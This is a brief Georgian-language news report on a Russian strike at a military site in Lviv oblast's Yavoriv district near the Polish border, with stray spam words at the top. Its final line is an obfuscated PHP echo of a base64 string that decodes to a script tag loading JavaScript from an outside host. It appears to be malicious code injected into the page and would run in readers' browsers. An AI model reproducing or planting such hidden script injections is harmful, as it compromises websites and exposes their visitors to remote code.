tube
ავერსი jaluzi
რუსეთის ძალებმა დასავლეთ უკრაინაში, ლვოვის ოლქში, პოლონეთის საზღვართან სამხედრო ინფრასტრუქტურის ობიექტზე დარტყმა განახორციელეს. მედიის მიერ გავრცელებული ინფორმაციით, შესაბამის ინფორმაციას ლვოვის სამხედრო საოლქო ადმინისტრაციის ხელმძღვანელი მაქსიმ კოზიცკი ავრცელებს.
 
კოზიცკის თქმით, ამოქმედდა საჰაერო თავდაცვის სისტემა.
 
„მადლობა საჰაერო თავდაცვას მუშაობისთვის. კვლავ ცეცხლი გაუხსნეს თითქმის პოლონეთის საზღვარზე, იავორივის რაიონის ტერიტორიაზე მდებარე სამხედრო ინფრასტრუქტურის ობიექტს“, – აღნიშნავს კოზიცკი.
 
მოჰყვა თუ არა სარაკეტო იერიშს ნგრევა, ჯერჯერობით უცნობია.
857
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");